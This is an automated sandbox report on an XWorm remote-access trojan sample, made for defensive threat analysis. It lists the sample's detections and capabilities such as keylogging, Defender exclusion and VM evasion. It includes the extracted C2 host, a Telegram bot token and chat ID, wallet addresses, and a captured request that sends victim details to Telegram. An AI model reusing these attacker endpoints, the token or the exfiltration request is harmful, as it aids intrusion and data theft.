Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Analysis ID:	1518076
MD5:	a4cd1ff60c7b69df5a061df3365e60c7
SHA1:	e85cd869046c923938c1268c5eed9d30f0f94668
SHA256:	657b68666c2b79d65d51a403dd7fa0e35b1109156290efd69a681777eb6e4107
Tags:	AsyncRATexe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Found malware configuration

Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["various-wages.gl.at.ply.gg"], "Port": "55202", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4", "Telegram URL": "https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: various-wages.gl.at.ply.gg
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 55202
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: <123456789>
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: <Xwormmm>
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: XWorm V5.4
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: USB.exe
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: bc1q4ul0exh4vcd9z9fchkyc5rud8dtwsgkugpg2hu
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 0xBAD33b9Ee3C66782641D7662A66557A167543AB8
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: TQHfQNjDo2mPrBMghaWA6fZLJ6zHLwXKn5
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q
Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack	String decryptor: 985088883

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbs source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: Accessibility.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: n.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb$ source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.0000000006797000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp, WER7A57.tmp.dmp.13.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb] source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\fSgG.pdbe source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Windows.Forms.pdb\|c source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.PDB source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSK source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Drawing.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Management.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49734 -> 147.185.221.22:55202
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: various-wages.gl.at.ply.gg

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49710 -> 147.185.221.22:55202

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.22 147.185.221.22

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: various-wages.gl.at.ply.gg

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Detected potential crypto function

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_009DD3A4	0_2_009DD3A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_04BB0006	0_2_04BB0006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 0_2_04BB0040	0_2_04BB0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_011DD3A8	5_2_011DD3A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_011D13F8	5_2_011D13F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054385C0	5_2_054385C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_0543D190	5_2_0543D190
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05439358	5_2_05439358
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05435384	5_2_05435384
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05435990	5_2_05435990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054327A0	5_2_054327A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054327B0	5_2_054327B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054303CC	5_2_054303CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_0543AA71	5_2_0543AA71
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05456408	5_2_05456408
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05453C50	5_2_05453C50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05456CD8	5_2_05456CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_05458128	5_2_05458128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Code function: 5_2_054560C0	5_2_054560C0

One or more processes crash

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088989997.00000000035B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000000.2075574675.0000000000232000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefSgG.exe8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2102027990.0000000006890000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088204496.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2102129900.0000000006B70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600180829.0000000005569000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Binary or memory string: OriginalFilenamefSgG.exe8 vs SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Settings.cs	Base64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, Settings.cs	Base64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, D0OGH51qG7TrJUYkAK.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.3742590.5.raw.unpack, YqOlYl2eFwtfPkt21E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.36f6b70.4.raw.unpack, YqOlYl2eFwtfPkt21E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.6b70000.7.raw.unpack, YqOlYl2eFwtfPkt21E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/11@2/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

